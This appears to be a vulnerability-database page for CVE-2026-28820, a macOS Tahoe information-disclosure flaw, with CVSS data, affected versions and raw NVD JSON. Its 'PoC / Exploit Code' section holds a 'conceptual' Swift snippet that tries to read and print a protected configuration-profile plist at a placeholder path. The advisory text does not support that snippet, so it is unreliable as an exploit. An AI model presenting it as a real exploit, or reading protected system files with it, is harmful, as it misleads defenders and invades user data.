Security Vulnerability Report
CVE-2026-28820 CVSS 5.3 MEDIUM

Published: 2026-03-25 01:17:07
Last Modified: 2026-03-26 20:16:11

Description

This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
swift
import Foundation
// Conceptual PoC for CVE-2026-28820
// Demonstrates an attempt to access sensitive data without proper entitlements
// This code is for educational purposes only.
func attemptUnauthorizedAccess() {
    let sensitiveFilePath = "/private/var/db/ConfigurationProfiles/Settings/sensitive_data.plist"
    let fileManager = FileManager.default
    // In a vulnerable version, insufficient checks might allow this read
    if fileManager.fileExists(atPath: sensitiveFilePath) {
        do {
            let content = try String(contentsOfFile: sensitiveFilePath, encoding: .utf8)
            print("[+] Successfully accessed sensitive data:")
            print(content)
        } catch {
            print("[-] Failed to read file: \(error.localizedDescription)")
        }
    } else {
        print("[-] File not found or path protected.")
    }
}
attemptUnauthorizedAccess()

References

https://support.apple.com/en-us/126794 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28820", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:07.177", "lastModified": "2026-03-26T20:16:11.320", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data."}, {"lang": "es", "value": "Este problema se abordó con comprobaciones mejoradas. Este problema se corrigió en macOS Tahoe 26.4. Una aplicación podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", 
"versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}